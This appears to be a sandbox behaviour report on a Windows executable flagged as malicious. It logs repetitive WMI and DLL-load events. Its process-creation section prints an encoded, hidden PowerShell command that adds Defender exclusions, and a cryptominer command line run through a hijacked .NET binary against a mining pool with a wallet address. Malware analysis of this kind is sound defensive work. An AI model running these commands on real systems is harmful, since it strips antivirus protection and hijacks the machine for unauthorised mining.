Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: o9OIGsDt4m.exe	ReversingLabs: Detection: 52%
Source: o9OIGsDt4m.exe	Virustotal: Detection: 41%

Source: AddInProcess.exe	String found in binary or memory: id-cmc-addExtensions
Source: AddInProcess.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

File read: C:\Users\user\Desktop\o9OIGsDt4m.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\o9OIGsDt4m.exe "C:\Users\user\Desktop\o9OIGsDt4m.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50	Jump to behavior

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: mscoree.dll	Jump to behavior
